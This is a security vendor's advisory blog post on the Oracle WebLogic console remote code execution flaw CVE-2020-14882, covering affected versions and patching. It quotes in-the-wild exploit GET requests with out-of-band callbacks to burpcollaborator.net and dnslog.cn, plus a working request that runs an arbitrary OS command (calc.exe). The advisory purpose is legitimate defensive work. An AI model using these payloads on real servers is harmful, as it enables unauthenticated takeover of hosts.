SecPod

Learn Search

Search across all Learn content

← Back to Security Research
Oracle WebLogic Server Under Active Exploitation (CVE-2020-14882)

Oracle WebLogic Server Under Active Exploitation (CVE-2020-14882)

Critical Remote Code Execution (RCE) vulnerability CVE-2020-14882 in the console component of the Oracle WebLogic Server Exploitation allows unauthenticated, remote attackers to execute commands on the affected servers. Oracle has assigned this vulnerability a CVSSv3 score of 9.8 out of 10, clearly ...

Oct 29, 2020By Vishesh S3 min read

Critical Remote Code Execution (RCE) vulnerability CVE-2020-14882 in the console component of the Oracle WebLogic Server Exploitation allows unauthenticated, remote attackers to execute commands on the affected servers. Oracle has assigned this vulnerability a CVSSv3 score of 9.8 out of 10, clearly showing its criticality, and indicating that it is essential to patch it ASAP. Johannes B. Ullrich, dean of research at the SANS Technology Institute, said in the post vulnerable Oracle WebLogic Servers that have not been patched until now “Assume that someone has compromised it.”. Vulnerability Management Software can prevent these attacks from occurring.

It seems that the exploits originated from a blog post published (in Vietnamese) by “Jang”. In his blog, he described how one can exploit the flaw to achieve remote code execution with only a single HTTP request. To prevent this exploit from occurring, a good patch management software will be helpful.

Vulnerability Details in Oracle WebLogic Server Exploitation

The RCE vulnerability exists in the console component of the WebLogic Server. Sending a crafted HTTP request can exploit the vulnerability and potentially lead to complete control of the host. In his blog post, the security researcher Jang included partial details of the flaw, which can be utilized for a Proof of Concept (PoC).

As discussed in SANS ISC Post, attackers are currently using the following exploits (the honeypot’s IP has been replaced with AAA.BBB.CCC.DDD):

GET /console/images/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLabel=HomePage1&handle= com.tangosol.coherence.mvel2.sh.ShellSession( %22java.lang.Runtime.getRuntime().exec(%27cmd /c GET /console/images/%252e%252e%252fconsole.portal?_nfpb=false&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession( \”java.lang.Runtime.getRuntime().exec( ‘nslookup%20AAA.BBB.CCC.DDD.0efp3gmy20ijk3tx20mqollbd2jtfh4.burpcollaborator.net’) GET /console/images/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLabel=HomePage1&handle=com.tangosol.coherence.mvel2.sh.ShellSession( %22java.lang.Runtime.getRuntime().exec( %27ping%20AAA.BBB.CCC.DDD.uajiak.dnslog.cn%27);%22); GET /console/images/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLabel=HomePage1&handle=java.lang.String(\”test\”)

Oracle has given this pre-authentication attack complexity a rating of “low” and has highlighted it as “easily exploitable.” Due to the “low” complexity of the exploit, attackers requires no user interaction and no privileges to exploit the vulnerability.

A typical crafted HTTP request that exploits the vulnerability and executes “calc.exe” is as follows:

http://<domain>/console/images/%252E%252E%252Fconsole.portal?_nfpb=false&_pageLable=&handle=com.tangosol.coherence.mvel2.sh.ShellSession(“java.lang.Runtime.getRuntime().exec(“calc.exe“);”);

In the above request, any other OS command can replace “calc.exe”.

Furthermore, Successful exploitation of the vulnerability “calc.exe” executed on the affected host as shown in the below picture.

Publicly available PoC

The proof-of-concept codes are publicly available for the vulnerability.

  • Exploit PoC on Twitter.
  • Exploit PoC on Github.

Impact of Oracle WebLogic Server Exploitation

However, an unauthenticated, remote attacker can exploit this vulnerability to execute commands and gain complete control of the affected host.

Affected Oracle WebLogic Server Exploitation Versions

  • 14.1.1.0.0
  • 12.2.1.4.0
  • 12.2.1.3.0
  • 12.1.3.0.0
  • 10.3.6.0.0

Solution

However, SanerNow has published security content to detect this vulnerability. Evidently, Oracle has already released a security update this month and these patches are available only for Oracle customers. Therefore I advise you to download the patch from the Oracle portal and proceed with its installation. Furthermore, you can utilize SanerNow software deployment capability to install executables/scripts.

Featured Posts

Open Patch Analysis & Exploitation Timeline: Seven CVEs, Two Remediation Tracks, CISA's September 2, 2026 KEV Additions
Patch Analysis & Exploitation Timeline: Seven CVEs, Two Remediation Tracks, CISA's September 2, 2026 KEV Additions

CVE Research

Patch Analysis & Exploitation Timeline: Seven CVEs, Two Remediation Tracks, CISA's September 2, 2026 KEV Additions

An analysis of seven vulnerabilities added to the CISA Known Exploited Vulnerabilities catalog on September 2, 2026, covering vulnerability types, remediation deadlines, and patch prioritization considerations.

Sep 18, 2026

Open Top Vulnerability Scanning Tools 2024

Top Vulnerability Scanning Tools 2024

CVE Research

Top Vulnerability Scanning Tools 2024

According to statistics, a new cyberattack was detected every 39 seconds in 2023! With this rise in number of attacks, protecting sensitive data becomes crucial and challenging. To protect IT, vulnerability scanners are the lead at defense, actively identifying weaknesses within systems and networks

Sep 17, 2026

Open The Webm Zero-Days: All Over The Wild

The Webm Zero-Days: All Over The Wild

CVE Research

The Webm Zero-Days: All Over The Wild

Webmproject, a popular media file format, has been experiencing hardships in security. Two of its libraries, libwebp and libvpx, have been found to contain zero-day vulnerabilities that affect multiple commonly used software products, such as Chrome, Edge, Tor, Telegram, and more! The two notorious

Sep 17, 2026

Open The Ultimate Vulnerability Assessment Checklist

The Ultimate Vulnerability Assessment Checklist

CVE Research

The Ultimate Vulnerability Assessment Checklist

Vulnerability assessment is the process of identifying and assessing vulnerabilities. It makes up for a significant chunk of vulnerability management, and vulnerability management relies heavily on it. Without properly assessing vulnerabilities, your vulnerability management program might fail to me

Sep 17, 2026